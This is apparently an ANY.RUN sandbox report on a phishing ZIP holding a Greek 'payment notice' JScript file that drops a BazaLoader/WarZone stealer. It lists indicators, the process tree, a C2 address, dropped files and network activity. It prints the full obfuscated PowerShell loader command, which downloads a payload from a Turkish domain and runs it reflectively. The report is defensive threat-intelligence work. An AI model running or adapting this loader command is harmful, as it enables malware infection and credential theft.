File name:

15052025_1700_13052025__7915322331.zip

Full analysis: https://app.any.run/tasks/bde12d7d-7aed-4fe5-9da4-f2fd243a9731
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: May 15, 2025, 17:11:13
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
arch-scr
susp-powershell
loader
reverseloader
payload
stealer
warzone
bazaloader
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract, compression method=deflate
MD5:

A9850D7E26BCBBB62025C283C111768C

SHA1:

E6A585141082FC76B215A2FF6FCBF2EE8CA79B5A

SHA256:

F32C577CFD35F399BF0BC95F1011AEB4155F11314FC7D41C31D20ED616815A6D

SSDEEP:

192:Bk5P780PdE7g9hmYqucRxgSAczNfZwmhUwOxYc93fCKDF:iDK7g9hmfuciujwmLiF

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Generic archive extractor

      • WinRAR.exe (PID: 4024)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 4688)

    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 4688)

    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 4688)

    • Actions looks like stealing of personal data

      • RegSvcs.exe (PID: 5728)

    • Steals credentials from Web Browsers

      • RegSvcs.exe (PID: 5728)

    • BAZALOADER has been detected (YARA)

      • RegSvcs.exe (PID: 5728)

    • WARZONE has been detected (YARA)

      • RegSvcs.exe (PID: 5728)

  • SUSPICIOUS

    • Probably obfuscated PowerShell command line is found

      • wscript.exe (PID: 3884)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 3884)

    • The process bypasses the loading of PowerShell profile settings

      • wscript.exe (PID: 3884)

    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 3884)

    • Executes script without checking the security policy

      • powershell.exe (PID: 4688)

    • Possibly malicious use of IEX has been detected

      • wscript.exe (PID: 3884)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 4688)

    • Connects to unusual port

      • RegSvcs.exe (PID: 5728)

    • Executable content was dropped or overwritten

      • RegSvcs.exe (PID: 5728)

    • The process drops C-runtime libraries

      • RegSvcs.exe (PID: 5728)

    • Process drops legitimate windows executable

      • RegSvcs.exe (PID: 5728)

    • The process drops Mozilla's DLL files

      • RegSvcs.exe (PID: 5728)

  • INFO

    • Manual execution by a user

      • wscript.exe (PID: 3884)

    • Disables trace logs

      • powershell.exe (PID: 4688)

    • Checks proxy server information

      • powershell.exe (PID: 4688)
      • slui.exe (PID: 976)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 4688)

    • Found Base64 encoded reflection usage via PowerShell (YARA)

      • powershell.exe (PID: 4688)

    • Found Base64 encoded text manipulation via PowerShell (YARA)

      • powershell.exe (PID: 4688)

    • Reads the computer name

      • RegSvcs.exe (PID: 5728)

    • Reads the machine GUID from the registry

      • RegSvcs.exe (PID: 5728)

    • Checks supported languages

      • RegSvcs.exe (PID: 5728)

    • Creates files or folders in the user directory

      • RegSvcs.exe (PID: 5728)

    • Create files in a temporary directory

      • RegSvcs.exe (PID: 5728)

    • The sample compiled with english language support

      • RegSvcs.exe (PID: 5728)

    • Reads the software policy settings

      • slui.exe (PID: 976)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

WarZone

(PID) Process(5728) RegSvcs.exe
C2 (1)196.251.115.121:4422
BuildIDTFHS94M973
Options
Install FlagFalse
Startup FlagFalse
Reverse Proxy local port5000
Offline logFalse
PersistanceFalse
UAC bypassFalse
Defender bypassFalse
Use ADSFalse
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0800
ZipCompression: Deflated
ZipModifyDate: 2025:05:12 08:01:50
ZipCRC: 0xaabf1cbd
ZipCompressedSize: 11400
ZipUncompressedSize: 1574055
ZipFileName: Ειδοποίηση πληρωμής_79153 22331.JS
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
129
Monitored processes
6
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe no specs wscript.exe no specs powershell.exe conhost.exe no specs #WARZONE regsvcs.exe slui.exe

Process information

PID
CMD
Path
Indicators
Parent process
976C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
3884"C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\Ειδοποίηση πληρωμής_79153 22331.JS"C:\Windows\System32\wscript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3896\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4024"C:\Program Files\WinRAR\WinRAR.exe" C:\Users\admin\Desktop\15052025_1700_13052025__7915322331.zipC:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
4688"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$fructificative = 'JGdhbmdidXN0ZXJzID0gJ3R4dC5xam1hdWhzZWgvbW9jLmFpZG5pcmF2LmZlaWhjbGVubmFoYy8vOnNwdHRoJzskcGljbGUgPSAnaHR0cHM6Ly9vbmZpbHRyZS5jb20udHIvd3AtY29udGVudC9naXBoeS5naWYnOyRtaWNyb2xpdGhzID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskbWljcm9saXRocy5IZWFkZXJzLkFkZCgnVXNlci1BZ2VudCcsJ01vemlsbGEvNS4wJyk7JHRpcHVsYSA9ICRtaWNyb2xpdGhzLkRvd25sb2FkRGF0YSgkcGljbGUpOyRhcmNoZW9sb2dpc3QgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkdGlwdWxhKTskY3liZXJzcGVlY2ggPSAnPDxzdWRvX3BuZz4+JzskZGlhbmRlciA9ICc8PHN1ZG9fb2R0Pj4nOyRiYW5pZSA9ICRhcmNoZW9sb2dpc3QuSW5kZXhPZigkY3liZXJzcGVlY2gpOyRzY29ybmZ1bCA9ICRhcmNoZW9sb2dpc3QuSW5kZXhPZigkZGlhbmRlcik7JGJhbmllIC1nZSAwIC1hbmQgJHNjb3JuZnVsIC1ndCAkYmFuaWU7JGJhbmllICs9ICRjeWJlcnNwZWVjaC5MZW5ndGg7JGNydW1taWVyID0gJHNjb3JuZnVsIC0gJGJhbmllOyRtaWxsaWxpdHJlcyA9ICRhcmNoZW9sb2dpc3QuU3Vic3RyaW5nKCRiYW5pZSwgJGNydW1taWVyKTskYXlvbmQgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtaWxsaWxpdHJlcyk7JHNhd2hvcnNlID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkYXlvbmQpOyRMYXZlcm5hID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJykuSW52b2tlKCRudWxsLCBbb2JqZWN0W11dIEAoJGdhbmdidXN0ZXJzLCcnLCcnLCcnLCdSZWdTdmNzJywnJywnJywnJywnJywnQzpcVXNlcnNcUHVibGljJywnYWRkcmVzcycsJ2pzJywnJywnJywnZGlzcGxheWFibGUnLCcyJywnJykp' -replace '','';$deedless = [System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($fructificative));Invoke-Expression $deedless;"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5728"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft .NET Services Installation Utility
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\regsvcs.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\bcrypt.dll
c:\windows\syswow64\user32.dll
WarZone
(PID) Process(5728) RegSvcs.exe
C2 (1)196.251.115.121:4422
BuildIDTFHS94M973
Options
Install FlagFalse
Startup FlagFalse
Reverse Proxy local port5000
Offline logFalse
PersistanceFalse
UAC bypassFalse
Defender bypassFalse
Use ADSFalse
Total events
10 525
Read events
10 514
Write events
11
Delete events
0

Modification events

(PID) Process:(4024) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:3
Value:
C:\Users\admin\Desktop\preferences.zip
(PID) Process:(4024) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:2
Value:
C:\Users\admin\Desktop\chromium_ext.zip
(PID) Process:(4024) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\omni_23_10_2024_.zip
(PID) Process:(4024) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\Desktop\15052025_1700_13052025__7915322331.zip
(PID) Process:(4024) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(4024) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(4024) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(4024) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(3884) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
Operation:writeName:JScriptSetScriptStateStarted
Value:
2DDE100000000000
(PID) Process:(5728) RegSvcs.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
Operation:writeName:MaxConnectionsPer1_0Server
Value:
10
Executable files
6
Suspicious files
6
Text files
2
Unknown types
0

Dropped files

PID
Process
Filename
Type
4688powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ejvnx4jv.vz5.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5728RegSvcs.exeC:\Users\admin\AppData\Local\Temp\vcruntime140.dllexecutable
MD5:7587BF9CB4147022CD5681B015183046
SHA256:C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
5728RegSvcs.exeC:\Users\admin\AppData\Roaming\.sbapeh.tmpbinary
MD5:A45465CDCDC6CB30C8906F3DA4EC114C
SHA256:4412319EF944EBCCA9581CBACB1D4E1DC614C348D1DFC5D2FAAAAD863D300209
5728RegSvcs.exeC:\Users\admin\AppData\Local\Temp\softokn3.dllexecutable
MD5:471C983513694AC3002590345F2BE0DA
SHA256:BB3FF746471116C6AD0339FA0522AA2A44A787E33A29C7B27649A054ECD4D00F
5728RegSvcs.exeC:\Users\admin\AppData\Roaming\igcnrvf.tmpbinary
MD5:29A644B1F0D96166A05602FE27B3F4AD
SHA256:BF96902FEB97E990A471492F78EE8386BCF430D66BDAEFDEAFBF912C8CF7CE46
5728RegSvcs.exeC:\Users\admin\AppData\Roaming\sxxyk.A.tmpbinary
MD5:414B7F9E82EE13FB08D39D366B2FBEC8
SHA256:6F9AD831D38FF839C0EE3593CC5452D7BE31D9725EE81D3E7AD20E4D91736971
5728RegSvcs.exeC:\Users\admin\AppData\Local\Temp\msvcp140.dllexecutable
MD5:109F0F02FD37C84BFC7508D4227D7ED5
SHA256:334E69AC9367F708CE601A6F490FF227D6C20636DA5222F148B25831D22E13D4
5728RegSvcs.exeC:\Users\admin\AppData\Roaming\ooDqjds.tmpbinary
MD5:1051384B8864AC718AE413E9B1D309A5
SHA256:3FC536607727B6030F7B4714D6E03B4CA040B2EBDBE81B74538F345432207360
5728RegSvcs.exeC:\Users\admin\AppData\Local\Temp\nss3.dllexecutable
MD5:D7858E8449004E21B01D468E9FD04B82
SHA256:78758BF7F3B3B5E3477E38354ACD32D787BC1286C8BD9B873471B9C195E638DB
5728RegSvcs.exeC:\Users\admin\AppData\Local\Temp\freebl3.dllexecutable
MD5:EF12AB9D0B231B8F898067B2114B1BC0
SHA256:2B00FC4F541AC10C94E3556FF28E30A801811C36422546A546A445ACA3F410F7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
9
TCP/UDP connections
54
DNS requests
19
Threats
7

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2104
svchost.exe
GET
200
2.19.11.120:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
2104
svchost.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
6964
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.1.crl
unknown
whitelisted
6964
SIHClient.exe
GET
200
2.19.11.120:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl
unknown
whitelisted
6964
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
6964
SIHClient.exe
GET
200
2.19.11.120:80
http://crl.microsoft.com/pki/crl/products/MicTimStaPCA_2010-07-01.crl
unknown
whitelisted
6964
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Signing%20CA%202.1.crl
unknown
whitelisted
6964
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.2.crl
unknown
whitelisted
6964
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Signing%20CA%202.2.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
2104
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
172.211.123.250:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
4
System
192.168.100.255:137
whitelisted
2104
svchost.exe
2.19.11.120:80
crl.microsoft.com
Elisa Oyj
NL
whitelisted
2104
svchost.exe
2.23.246.101:80
www.microsoft.com
Ooredoo Q.S.C.
QA
whitelisted
6544
svchost.exe
40.126.31.71:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
3216
svchost.exe
172.211.123.250:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
4688
powershell.exe
95.173.189.182:443
onfiltre.com.tr
Netinternet Bilisim Teknolojileri AS
TR
suspicious

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.185.78
whitelisted
client.wns.windows.com
  • 172.211.123.250
  • 172.211.123.248
whitelisted
crl.microsoft.com
  • 2.19.11.120
  • 2.19.11.105
whitelisted
www.microsoft.com
  • 2.23.246.101
  • 95.101.149.131
whitelisted
login.live.com
  • 40.126.31.71
  • 20.190.159.129
  • 20.190.159.131
  • 40.126.31.130
  • 40.126.31.128
  • 20.190.159.4
  • 40.126.31.129
  • 40.126.31.73
whitelisted
onfiltre.com.tr
  • 95.173.189.182
unknown
settings-win.data.microsoft.com
  • 20.73.194.208
  • 4.231.128.59
whitelisted
channelchief.varindia.com
  • 103.249.97.230
unknown
slscr.update.microsoft.com
  • 4.175.87.197
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 52.165.164.15
whitelisted

Threats

PID
Process
Class
Message
Misc activity
INFO [ANY.RUN] USER_AGENTS Suspicious User-Agent (Mozilla/5.0)
Exploit Kit Activity Detected
ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound
Exploit Kit Activity Detected
ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1
Exploit Kit Activity Detected
ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2
Potentially Bad Traffic
PAYLOAD [ANY.RUN] Reverse Base64 Encoded EXE Inbound
A Network Trojan was detected
ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound
5728
RegSvcs.exe
Misc Attack
ET DROP Spamhaus DROP Listed Traffic Inbound group 41
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
15052025_1700_13052025__7915322331.zip